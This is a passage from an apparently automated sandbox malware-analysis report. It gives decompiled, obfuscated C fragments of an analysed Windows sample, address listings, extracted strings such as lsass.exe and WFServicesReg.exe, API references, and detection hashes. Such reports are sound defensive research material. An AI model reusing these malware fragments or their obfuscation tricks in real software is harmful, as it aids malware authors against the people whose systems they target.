					_t31 =  *(_t64 - 8);
					 *0x50bf0d = 1;
					 *(_t64 - 8) = _t31;
					 *0x50915a =  *0x50915a - _t49;
					_push(E004D6FC9);
					_push(E004ACF9D);
					return _t31;
				}
			}


















                      0x004d6f26
                      0x004d6f26
                      0x004d6f26
                      0x004d6f26
                      0x004d6f29
                      0x004d6f2b
                      0x004d6f2b
                      0x004d6f33
                      0x004d6f37
                      0x004d6f39
                      0x004d6f39
                      0x004d6f3f
                      0x004d6f3f
                      0x004d6f47
                      0x004d6f4e
                      0x004d6f55
                      0x004d73a7
                      0x004d73a7
                      0x004d73aa
                      0x004d73b2
                      0x004d740e
                      0x004d7419
                      0x004d7420
                      0x004d7427
                      0x004d742c
                      0x004d7433
                      0x004d7437
                      0x004d744c
                      0x004d744f
                      0x004d7455
                      0x004d745b
                      0x004d7462
                      0x004d746d
                      0x004d746f
                      0x004d7471
                      0x004d747b
                      0x004d747b
                      0x004d73b4
                      0x004d73ba
                      0x004d73c7
                      0x004d73d8
                      0x004d73de
                      0x004d73e4
                      0x004d73e9
                      0x004d73eb
                      0x004d73f9
                      0x004d7408
                      0x00000000
                      0x004d6f5b
                      0x004d6f5b
                      0x004d6f66
                      0x004d6f68
                      0x004d6f73
                      0x00000000
                      0x00000000
                      0x004d6f7f
                      0x004d6f82
                      0x004d6f85
                      0x004d6f93
                      0x004d6f96
                      0x004d6fa1
                      0x004d6fb7
                      0x004d6fbe
                      0x004d6fc3
                      0x004d6fc8
                      0x004d6fc8

                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID:
                      • String ID: NtPowerInformation$NtSetDriverEntryOrder$api-ms-win-core-string-l1-1-0.dll
                      • API String ID: 0-3511679661
                      • Opcode ID: 8657f87f0b2a316015e9e3f84ef9c322977aaa3de5810a0e3b78c26f2723ba66
                      • Instruction ID: b1726d6c541e8e13319ae4cabb8bf0908c3974fb621d7a5d687123523e960fc5
                      • Opcode Fuzzy Hash: 8657f87f0b2a316015e9e3f84ef9c322977aaa3de5810a0e3b78c26f2723ba66
                      • Instruction Fuzzy Hash: 3B31EF36A143069EDB109FB8DCE46CD3FB1EB78300F08846BD954973AAE3740A49EB54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004AB5E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 86COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: BuffCharUpper
                      • String ID: _Z2$lsass.exe$`}
                      • API String ID: 3964851224-222179090
                      • Opcode ID: 04a93955ed76a07559b174304d03654fcd9058efb7b0e8f80b0ef264517d0523
                      • Instruction ID: c14262cc0cfc577d7e527d6ba04e30c59e9974aeddc396c4240b4b10ec982f51
                      • Opcode Fuzzy Hash: 04a93955ed76a07559b174304d03654fcd9058efb7b0e8f80b0ef264517d0523
                      • Instruction Fuzzy Hash: 9131C074A5120A8FDB00EF75DC986CD3B71EF3A304F04802AC8449B36BE3790A49EB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00483026 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 49libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      • wuapi.dll, xrefs: 0048304E
                      • api-ms-win-core-string-l1-1-0.dll, xrefs: 004830A3
                      • api-ms-win-core-localization-l1-1-0.dll, xrefs: 00483094
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: api-ms-win-core-localization-l1-1-0.dll$api-ms-win-core-string-l1-1-0.dll$wuapi.dll
                      • API String ID: 190572456-3045657114
                      • Opcode ID: 3499ff0237c74093f48473be7e281adb5b4eb879b23861b0b5f48fa057f14407
                      • Instruction ID: ce677e28918c82482630ba1c3e801c863cfc24e41e4b66ce76800d8eba39b263
                      • Opcode Fuzzy Hash: 3499ff0237c74093f48473be7e281adb5b4eb879b23861b0b5f48fa057f14407
                      • Instruction Fuzzy Hash: 94112A74F8030A9BDB00EFB8D8D56CDBBB0FB29710F44406A9984E3316E2785A85DB51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004D747D Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43networkCOMMON
                      Download Yara Rule
                      C-Code - Quality: 40%
                      			E004D747D(void* __ebx, short __ecx, void* __edx, void* __edi, void* __esi) {
				int _t27;
				char* _t29;
				char* _t31;
				int _t33;
				char* _t37;
				char* _t46;
				signed int _t54;
				signed int _t68;
				void* _t71;
				void* _t73;
				void* _t75;

				_t73 = __esi;
				_t71 = __edi;
				_t32 = __ebx;
				_t23 =  *(_t75 - 8);
				_push( *((intOrPtr*)(_t75 - 0x20)));
				 *0x509160 = __ecx;
				_t54 = 0;
				if(__ebx <= 0x2e6b) {
					_t32 = 0x45eaa7;
					_t54 =  !0x00000077;
				}
				_t68 =  *0x5091fe; // 0x8d5f
				 *0x50bf15 = E004B78F3(_t23 - 0xcf, _t32, _t54, 0, _t71, 0);
				_t27 = InternetCloseHandle(??);
				_t33 = _t27;
				if( *((intOrPtr*)(_t75 - 0x2050)) <= 0x100000) {
					 *(_t75 - 0xc) = _t33;
					 *(_t75 - 8) = _t27;
					_t37 =  *(_t75 - 0xc);
					 *0x50bf0e =  *0x50bf0e - 0x64af;
					 *0x50bf0e =  *0x50bf0e + 0x64af;
					E004CA23E(_t27, _t37, _t68, _t71, _t73);
					_t29 =  *(_t75 - 8);
					if( *((intOrPtr*)(_t75 - 0x2050)) > 0) {
						_t73 = 0;
						_t46 =  &(_t37[0x19a]);
						 *(_t75 - 8) = _t29;
						_t29 = "Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll";
						 *0x509d04 = _t46;
						_push(1);
						_push(1);
						_push(_t46);
						_push(E004D9A79);
						goto __ebx;
					}
					if(0xc95e != 0xc95e) {
						L10:
						 *0x50bf15 = _t29;
						if(_t29 >= 0xb) {
							 *0x50903e =  *0x50903e + _t29;
						}
						 *0x5098d8 = _t29;
					} else {
						if((_t68 & 0x007a289b) == 0) {
							goto L10;
						}
					}
					 *(_t75 - 0xc) = 0x3b7426;
					_push( *((intOrPtr*)(_t75 - 0x204c)));
					 *(_t75 - 8) = 0x3b7426;
					 *(_t75 - 8) = _t29;
					_push(E004D9C89);
					_push(E004ABEF8);
					return  *(_t75 - 8);
				} else {
					 *(_t75 - 8) = _t27;
					_t31 =  *(_t75 - 8);
					 *(_t75 - 8) = _t31;
					 *0x5090c4 =  *0x5090c4 - 0x2f40d9;
					_push(0x2f40d9);
					_push(E004D7525);
					_push(E004A7263);
					return _t31;
				}
			}














                      0x004d747d
                      0x004d747d
                      0x004d747d
                      0x004d747d
                      0x004d7480
                      0x004d7483
                      0x004d748a
                      0x004d7494
                      0x004d749c
                      0x004d74af
                      0x004d74b1
                      0x004d74b6
                      0x004d74cc
                      0x004d74d4
                      0x004d74da
                      0x004d74e6
                      0x004d9a0d
                      0x004d9a1b
                      0x004d9a2b
                      0x004d9a2e
                      0x004d9a34
                      0x004d9a3c
                      0x004d9a41
                      0x004d9a4b
                      0x004d9a51
                      0x004d9a57
                      0x004d9a5a
                      0x004d9a5d
                      0x004d9a62
                      0x004d9a68
                      0x004d9a6a
                      0x004d9a6c
                      0x004d9a6d
                      0x004d9a77
                      0x004d9a77
                      0x004d9c14
                      0x004d9c29
                      0x004d9c30
                      0x004d9c3b
                      0x004d9c3d
                      0x004d9c3d
                      0x004d9c44
                      0x004d9c16
                      0x004d9c1d
                      0x00000000
                      0x004d9c22
                      0x004d9c1d
                      0x004d9c51
                      0x004d9c54
                      0x004d9c5a
                      0x004d9c5f
                      0x004d9c7e
                      0x004d9c83
                      0x004d9c88
                      0x004d74ec
                      0x004d74f7
                      0x004d7501
                      0x004d750a
                      0x004d7512
                      0x004d7519
                      0x004d751a
                      0x004d751f
                      0x004d7524
                      0x004d7524

                      APIs
                      • InternetCloseHandle.WININET(?), ref: 004D74D4
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: CloseHandleInternet
                      • String ID: SetMagnificationDesktopColorEffect$k.$~u<
                      • API String ID: 1081599783-1246232966
                      • Opcode ID: 3df1d36a4490279f77efc6def4146ba34226ad3000170e01ac1d3022220510a0
                      • Instruction ID: d71270241184a957727ce23a4824c858840cffb674152b7a76dba5d64002c0a0
                      • Opcode Fuzzy Hash: 3df1d36a4490279f77efc6def4146ba34226ad3000170e01ac1d3022220510a0
                      • Instruction Fuzzy Hash: 8D01B535F08345ABD711AFA4DCAABCE7BB1F768314F00406AA505977A6E7780A44DB04
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00476CD3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcAddress.KERNEL32(?,?), ref: 00476DEA
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: HMETAFILEPICT_UserSize$WFServicesReg.exe
                      • API String ID: 190572456-4294952848
                      • Opcode ID: 343ea60e68344f5c4831986dd5e0e7d04e0aced1e2872b20cf81d5c619833ec8
                      • Instruction ID: 95308b3327b3a4602a48570b9f8f40c471b3726032f966381c3c0b051c1efd9c
                      • Opcode Fuzzy Hash: 343ea60e68344f5c4831986dd5e0e7d04e0aced1e2872b20cf81d5c619833ec8
                      • Instruction Fuzzy Hash: 2231CD75E447069FDB019FB8EC842DD7FB2FB79300F18846A9448E7366E3780A049B49
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0047D296 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 77libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: G.V$WFServicesReg.exe
                      • API String ID: 190572456-3986490578
                      • Opcode ID: 00273bae720655747080f24c3a4638eae955bc97fbb5aea02625aa5fe2a4d7a7
                      • Instruction ID: 9fb4c9412e1d2e6c463f6f32990ec3d5f4ba1efa244fcf20efb155b5819e652a
                      • Opcode Fuzzy Hash: 00273bae720655747080f24c3a4638eae955bc97fbb5aea02625aa5fe2a4d7a7
                      • Instruction Fuzzy Hash: D1214C31B142038FDB109F39EC882CD3F71EB76320B088A2AD865873A9D3350909EB45
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004A1987 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: CoLockObjectExternal$ucmhc.dll
                      • API String ID: 190572456-642180313
                      • Opcode ID: f81f5b9af814e7a5ce3f690ca8b1236cc320492e0c804d40170fa60f83f7ed9e
                      • Instruction ID: 9d1b222fdaa57484d614c9eae648fa111678018cce701875eef80adfee206b24
                      • Opcode Fuzzy Hash: f81f5b9af814e7a5ce3f690ca8b1236cc320492e0c804d40170fa60f83f7ed9e
                      • Instruction Fuzzy Hash: 9A21F479E543065FDB009FB4E8A42CE7BB0EB3A304F44843AD845AB366E3780949DB45
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004C7D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: FindWindow
                      • String ID: NlsLexicons001d.dll$_0(
                      • API String ID: 134000473-4283637930
                      • Opcode ID: 1a421af918a276840c6cca0b1674cc1c0c35ab0b4eecb1da7b45860f09c41978
                      • Instruction ID: 8b406c63b2544e839198a97db6f46c5b99a85fd016b24792b768d4cdaa291694
                      • Opcode Fuzzy Hash: 1a421af918a276840c6cca0b1674cc1c0c35ab0b4eecb1da7b45860f09c41978
                      • Instruction Fuzzy Hash: 05E0C2293A03022BDE406D749DA9BE42E86AF78F14F5001267216FB3C6E1EA04808765
                      Uniqueness

                      Uniqueness Score: -1.00%